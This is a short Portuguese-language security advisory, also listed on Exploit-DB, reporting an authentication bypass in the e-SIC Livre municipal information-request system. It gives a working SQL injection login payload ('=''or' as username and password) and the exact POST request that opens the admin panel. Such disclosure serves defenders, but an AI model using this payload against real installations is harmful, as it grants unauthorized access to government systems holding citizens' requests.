E-Sic Software livre CMS - Autentication Bypass

Vulnerabilidade garante acesso ao painel sem credenciais de administrador.

Postado por @elber333 - 10/10/2017 - FireShell Security team
fireshellsecurity.team - MAIL: f0lds@fireshellsecurity.team
Exploit-DB: https://www.exploit-db.com/exploits/42980/

TODOS OS TESTES FORAM REALIAZADOS EM UM AMBIENTE LOCAL ONDE O CMS FOI HOSPEDADO NA MINHA MÁQUINA.

Sobre o Software:

O e-SIC Livre é uma solução voltada para a gestão de atendimento ao público baseado em perguntas e respostas, e visa oferecer aos municípios um serviço de pleno acordo com a Lei de Acesso à Informação (LAI). Mais transparência e informação direta e clara do governo para com o cidadão. Desenvolvido em PHP/MySQL, é totalmente funcional na maioria dos servidores, e possui módulos como: cadastro de organizações e departamentos, requerimentos com protocolo automático, perguntas frequentes, etc..

Download: https://softwarepublico.gov.br/social/articles/0000/0482/esiclivre.rar

A vulnerabilidade:

    A vulnerabilidade está na área de login do e-sic, onde podemos entrar no painel apenas usando alguns parametros como usuário e senha. Url: http://localhost/esic/index/ Usuario: '=''or' Senha: '=''or'

    POST: http://localhost/esic/index/index.php

    DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar

Mais sobre e-sic:

E-Sic Software livre CMS - Sql Injection
E-Sic Software livre CMS - XSS